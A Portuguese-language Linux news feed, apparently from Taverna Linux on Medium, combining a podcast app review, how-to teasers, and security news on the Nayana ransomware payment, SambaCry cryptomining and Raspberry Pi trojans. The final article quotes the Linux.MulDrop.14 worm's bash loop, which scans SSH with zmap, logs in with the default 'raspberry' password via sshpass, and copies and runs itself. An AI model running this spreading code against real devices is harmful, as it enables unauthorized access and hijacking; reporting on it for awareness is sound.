Vocal - Gerenciador de Podcasts Moderno para Desktop Linux · Review

Um gerenciador de podcast simple e poderoso para desktops Linux.

Desenvolvido por Nathan Dyer, Vocal é uma aplicativo poderoso, rápido e intuitivo que ajuda os viciados em podcast a gerenciar suas listas, e desfrutar do melhor que a publicação independente de áudio e vídeo tem para oferecer.

Os recursos do Vocal oferecem suporte total para download e streaming de episódios seja áudio ou vídeo, ótima integração com o sistema, análise de links iTunes, importação e exportação OPML, e muito mais.

Além disso, possui excelentes recursos inteligentes, como manter sua biblioteca limpa automaticamente de arquivos antigos, e a capacidade de personalizar intervalos do player para avançar e retroceder.

Características

  • Suporte a podcasts em áudio e vídeo
  • Streaming e download de podcasts
  • Verificação/download automática de novos episódios
    Integração com o sistema Elementary OS (notificações, launchers badges, sons de menu e etc.)
  • Importação/exportação de subscrições (feed de podcast individual ou da biblioteca inteira)

Review Completo

Inscreva-se • Subscrible
youtube.com/c/tavernaLINUXbr
📄 comente 👍 curta 🔄 compartilhe!

🐼 Envie seu vídeo ou artigo.
Twitter · Facebook · Instagram · G+ · Quitter · Tumblr · SoundCloud


🎧 Vocal - Gerenciador de Podcasts Moderno para Desktop Linux · Review was originally published in Taverna Linux on Medium, where people are continuing the conversation by highlighting and responding to this story.

Empresa de Web Hosting Paga $1 Milhão para Resgatar Arquivos de Ataque Ransomware

Mais de 3,4 mil sites foram tirados do ar por ransomware que afetou o provedor de hospedagem web sul-coreano Nayana

image by arstechnica.com

O provedor de hospedagem web sul-coreano Nayana concordou em pagar $1 milhão em bitcoins para hackers depois que um ransomware Linux infectou seus 153 servidores, criptografando 3.400 sites de negócios e seus dados hospedados neles.

De acordo com uma publicação no seu blog, a empresa descreve que este evento lamentável aconteceu no dia 10 de junho, quando o malware ransomware atingiu seus servidores de hospedagem e o atacante exigiu 550 bitcoins (mais de $1.6 milhões) para desbloquear os arquivos criptografados.

No entanto, a empresa mais tarde negociou com os cibercriminosos e concordou em pagar 397,6 bitcoins (cerca de $1.01 milhões) em três parcelas para que seus seus arquivos fossem descriptografados.

A empresa de hospedagem já pagou duas parcelas até o momento da publicação deste artigo e pagaria a última parcela resgate após a recuperação de dados de dois terços dos seus servidores infectados.

De acordo com a empresa de segurança Trend Micro, o Ransomware usado no ataque foi o Erebus que foi visto pela primeira vez em setembro do ano passado e em fevereiro deste ano com capacidades de desvio de controle de conta de usuário do Windows.

Uma vez que os servidores de hospedagem estavam rodando o kernel v2.6.24.2, pesquisadores acreditam que o ransomware Erebus pode ter usado vulnerabilidades conhecidas, como DIRTY COW; ou um exploit local para assumir o acesso root do sistema.

“A versão do Apache da empresa usada é executada como um usuário nobody(uid=99), o que indica que um exploit local também pode ter sido usado no ataque”, observam os pesquisadores.
“Além disso, o website da Nayana usa o Apache v1.3.36 e PHP v5.1.4, ambos lançados de volta em 2006”.

O serviço de resgate que visa principalmente usuários na Coréia do Sul, criptografa documentos do Office, bancos de dados, arquivos e arquivos multimídia usando o algoritmo RSA-2048 e anexa-os com uma extensão. ecrypt antes de exibir a nota de resgate.

O ransomware tem como foco principalmente usuários na Coréia do Sul, criptografando documentos de escritório, bancos de dados, arquivos e arquivos multimídia usando o algoritmo RSA-2048 e, em seguida, anexando a eles uma extensão .ecrypt antes de exibir a nota de resgate.

“Primeiro o arquivo é codificado com criptografia RC4 em blocos de 500kB com chaves geradas aleatoriamente”, dizem os pesquisadores. “A chave RC4 é então codificada com o algoritmo de criptografia AES, que é armazenado no arquivo. A chave AES é novamente criptografada usando o algoritmo RSA-2048 que também é armazenada no arquivo”.

A chave pública que é gerada localmente é compartilhada, enquanto a chave particular é criptografada usando criptografia AES e outra chave é gerada aleatoriamente.

De acordo com a análise realizada pelos pesquisadores da Trend Micro, a descriptografia de arquivos infectados não é possível sem se apoderar das chaves RSA.

Assim, a única maneira segura de lidar com ataques ransomware é a prevenção. A melhor defesa contra o resgate é criar conscientização dentro das organizações, bem como manter back-ups que são rotacionados regularmente.

A maioria dos vírus são introduzidos pela abertura de anexos infectados ou clicando em links para malware geralmente em e-mails de spam. Portanto, NÃO CLIQUE em links fornecidos em e-mails e anexos de fontes desconhecidas.

Além disso, verifique se os seus sistemas estão executando a versão mais recente dos aplicativos instalados.


Empresa de Web Hosting Paga $1 Milhão para Resgatar Arquivos de Ataque Ransomware was originally published in Taverna Linux on Medium, where people are continuing the conversation by highlighting and responding to this story.

Como instalar o Calibre no Linux de um jeito simples

Como instalar o Calibre no Linux de um jeito simples

Se você procura uma forma de gerenciar seus livros eletrônicos, experimente instalar o Calibre no Linux. O programa pode tornar o controle de seus e-books muito mais simples.

Leia o restante do texto "Como instalar o Calibre no Linux de um jeito simples"

Como instalar o navegador Pale Moon no Linux manualmente

Como instalar o navegador Pale Moon no Linux manualmente

Já conhece o Pale Moon, um navegador que é o Firefox mais rápido que o Firefox? Pois se você quiser experimentar esse programa, veja a seguir como instalar o Pale Moon no Linux manualmente.

Leia o restante do texto "Como instalar o navegador Pale Moon no Linux manualmente "

Como compartilhar a área de trabalho com o ScreenTask

Está precisando compartilhar a área de trabalho com outros computadores? Então instale o ScreenTask e faça isso de um jeito rápido, fácil e sem custos.

Leia o restante do texto "Como compartilhar a área de trabalho com o ScreenTask"

Como converter vídeo em imagens usando o FFmpeg

Como converter vídeo em imagens usando o FFmpeg

Já pensou em transformar um vídeo em um grande conjunto de imagens? Pois então veja como converter vídeo em imagens usando o FFmpeg.

Leia o restante do texto "Como converter vídeo em imagens usando o FFmpeg"

Como instalar facilmente o compilador e vários outros itens relacionados a linguagem Go

Como instalar facilmente o compilador e vários outros itens relacionados a linguagem Go

Se você é ou pretende ser usuário da linguagem Go, veja como instalar facilmente o compilador e vários outros itens relacionados a essa linguagem.

Leia o restante do texto "Como instalar facilmente o compilador e vários outros itens relacionados a linguagem Go"

Editar arquivos PDF no Linux com Master PDF Editor

Editar arquivos PDF no Linux com Master PDF Editor

Se você está precisando editar arquivos PDF no Linux e não encontra o aplicativo certo para isso, então precisa conhecer e experimentar o Master PDF Editor.

Leia o restante do texto "Editar arquivos PDF no Linux com Master PDF Editor"

Hackers começaram a usar “SambaCry Flaw” para Hack em Sistemas Linux

Durante o primeiro dia eles ganharam cerca de 1 XMR (cerca de $55 de acordo com a taxa de câmbio em 08.06.2017)

image by Proactive Computing

Lembra do SambaCry?

Duas semanas atrás, relatamos sobre uma vulnerabilidade de execução de código remoto crítico que perdurava a 7 anos no software de rede de Samba (re-implementação do protocolo de rede SMB) permitindo um hacker remoto de assumir o controle total de máquinas Linux e UNIX vulneráveis.

Para saber mais sobre a vulnerabilidade SambaCry (CVE-2017–7494) e como ele funciona, você pode ler nosso artigo anterior.

Falha no Samba Permite que Hackers Acessem Milhares de PCs com Linux e Unix

Na época, cerca de 485.000 computadores habilitados com Samba foram expostos na Internet, e os pesquisadores previram que os ataques baseados no SambaCry também teriam o potencial para se espalhar amplamente como Ransoware WannaCry.

A previsão foi bastante precisa, já que os honeypots criados pela equipe de pesquisadores da Kaspersky Lab capturaram uma campanha de malware que está explorando a vulnerabilidade SambaCry para infectar computadores Linux com o software de mineração Cryptocurrency.

Outro pesquisador de segurança, Omri Ben Bassat, descobriu de forma independente a mesma campanha chamando como “EternalMiner”.

De acordo com os pesquisadores, um grupo desconhecido de hackers começou a sequestrar PCs Linux apenas uma semana após a falha do Samba ter sido divulgada publicamente e instalar uma versão atualizada do “CPUminer”, um software de mineração para a cryptocurrency “Monero”.

Depois de comprometer as máquinas vulneráveis usando a vulnerabilidade SambaCry, os atacantes executam duas cargas nos sistemas alvos:

  • INAebsGB.so — Um shell reverso que fornece acesso remoto aos atacantes.
  • cblRWuoCc.so — Uma backdoor que inclui utilitários de mineração cryptocurrency - CPUminer.
Através do reverse-shell deixado no sistema, os atacantes podem alterar a configuração de um ‘mineiro’ que já está em execução ou infectar o computador da vítima com outros tipos de malware”, dizem os pesquisadores Kaspersky.

A Mineração de cripto moedas pode ser um investimento caro, uma vez que exige uma enorme quantidade de poder computacional, mas esse malware de mineração de cripto moeda torna a mineração mais fácil para cibercriminosos, permitindo-lhes utilizar recursos computacionais de sistemas comprometidos para obter o lucro.

Se você tem acompanhado regularmente sites sobre cyber segurança, você deve estar ciente do Adylkuzz, um malware de mineração cryptocurrency que estava usando a vulnerabilidade SMB do Windows, pelo menos, duas semanas antes do surto de ataques do Ransomware WannaCry.

O malware Adylkuzz também estava minerando Monero, utilizando a enorme quantidade de recursos de computação dos sistemas Windows comprometidos.

Os atacantes por trás do ataque CPUminer baseado no SambaCry já ganharam 98 XMR, que vale hoje cerca de $5.380 e esta numero está crescendo continuamente com o aumento do número de sistemas Linux comprometidos.

Durante o primeiro dia eles ganharam cerca de 1 XMR (cerca de $55 de acordo com a taxa de câmbio em 08.06.2017), mas durante a última semana eles ganharam cerca de 5 XMR por dia”, de acordo com os pesquisadores.

Os mantenedores do Samba já corrigiram a vulnerabilidade em suas novas versões 4.6.4 / 4.5.10 / 4.4.14, e estão incentivando aqueles que utilizam uma versão vulnerável do Samba para instalarem o patch o mais rapidamente possível.

🐼 Envie seu artigo.
Twitter · Facebook · Instagram · G+ · Quitter · Tumblr · SoundCloud


Hackers começaram a usar “SambaCry Flaw” para Hack em Sistemas Linux was originally published in Taverna Linux on Medium, where people are continuing the conversation by highlighting and responding to this story.

Novo Malware Linux Foca Equipamentos Raspberry Pi para Mineração de CryptoCurrency

Pesquisadores de segurança da Dr. Web descobriram dois novos Malwares para Linux, um deles para mineração cryptocurrency usando dispositivos Raspberry PI.

Pesquisadores de malware do fabricante de antivírus russo Dr. Web descobriram um novo Trojan para Linux, rastreado como KinuX.MulDrop.14, que está infectando dispositivos Raspberry Pi com a finalidade de minerar cryptocurrency.

De acordo com a Dr. Web, o malware foi visto pela primeira vez on-line em maio, os pesquisadores descobriram um script contendo um aplicação compactada e criptografada.

O malware KinuX.MulDrop.14 tem como alvo dispositivos Raspberry Pi não protegidos que possuem portas SSH abertas para conexões externas.

Uma vez que o malware infecta o dispositivo, ele irá primeiro alterar a senha da conta “pi” para:

\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1

Em seguida, o malware desliga vários processos e instala bibliotecas como ZMap e SSHPass que ele usa para suas operações.

O Trojan Linux que é um script bash contendo um programa de mineração, que é compactado com gzip e criptografado com base64. Uma vez iniciado, o script encerra vários processos e instala bibliotecas necessárias para sua operação”. afirma a análise publicada pela Dr Web.

Ele muda a senha do usuário “pi” para “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”

O malware, em seguida, inicia um processo de mineração cryptocurrency, mas usa o ZMap para digitalizar a Internet para infectar outros dispositivos.

Toda vez que o malware encontra um dispositivo de Raspberry Pi na Internet ele usa o sshpass para tentar fazer logon usando o nome de usuário padrão “pi” e a senha “raspiberry”.

O código malicioso só tenta usar esse par de valores, isso sugere que o malware alveja apenas dispositivos Raspberry Pi. Especialistas acreditam que o malware poderia ser melhorado e que pode ser usado nas próximas semanas para atingir outras plataformas.

Abaixo vemos parte do código compartilhado pela Dr. Web:

NAME=`mktemp -u 'XXXXXXXX'` 
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
done

Os pesquisadores também analisaram um segundo malware para Linux, apelidado de Linux.ProxyM que foi usado para criar uma rede proxy.

O código malicioso inicia um servidor proxy SOCKS em dispositivos infectados usados para retransmitir o tráfego malicioso, disfarçando sua real fonte.

“O outro Trojan foi nomeado de Linux.ProxyM. ataques envolvendo este trojan foram observados desde Fevereiro de 2017, mas atingiram o pico no final de Maio. O gráfico abaixo mostra quantos ataques foram feitas pelo Linux.ProxyM e identificados pelos especialistas da Doctor Web” Afirma a Dr. Web.

De acordo com a Dr. Web, o número de dispositivos infectados com o Linux.ProxyM atingiu 10.000 unidades desde a sua descoberta em Fevereiro de 2017.

🐼 Envie seu artigo.
Twitter · Facebook · Instagram · G+ · Quitter · Tumblr · SoundCloud


Novo Malware Linux Foca Equipamentos Raspberry Pi para Mineração de CryptoCurrency was originally published in Taverna Linux on Medium, where people are continuing the conversation by highlighting and responding to this story.